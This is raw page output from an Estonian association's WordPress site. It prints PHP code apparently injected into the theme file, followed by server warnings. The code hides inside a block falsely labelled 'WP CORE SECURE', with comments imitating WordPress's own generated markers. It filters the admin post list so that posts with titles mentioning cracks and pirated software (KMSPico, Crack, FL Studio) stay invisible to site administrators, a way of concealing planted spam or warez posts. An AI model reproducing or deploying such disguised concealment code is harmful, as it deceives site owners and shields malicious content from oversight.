# BEGIN WP CORE SECURE
# Käsud (read) "BEGIN WP CORE SECURE" ja "END WP CORE SECURE" vahel on
# dünaamilselt genereeritud ja neid tuleks muuta üksnes WordPressi filtrite abil.
# Kõik muudatused nende kahe markeri vahel kirjutatakse üle.
function exclude_posts_by_titles($where, $query) {
global $wpdb;
if (is_admin() && $query->is_main_query()) {
$keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop'];
foreach ($keywords as $keyword) {
$where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%");
}
}
return $where;
}
add_filter('posts_where', 'exclude_posts_by_titles', 10, 2);
# END WP CORE SECURE
Warning: Cannot modify header information - headers already sent by (output started at /data02/virt118102/domeenid/www.epilepsialiit.ee/htdocs/wp-content/themes/twentytwentythree/functions.php:1) in /data02/virt118102/domeenid/www.epilepsialiit.ee/htdocs/wp-includes/pluggable.php on line 1435
Warning: Cannot modify header information - headers already sent by (output started at /data02/virt118102/domeenid/www.epilepsialiit.ee/htdocs/wp-content/themes/twentytwentythree/functions.php:1) in /data02/virt118102/domeenid/www.epilepsialiit.ee/htdocs/wp-includes/pluggable.php on line 1438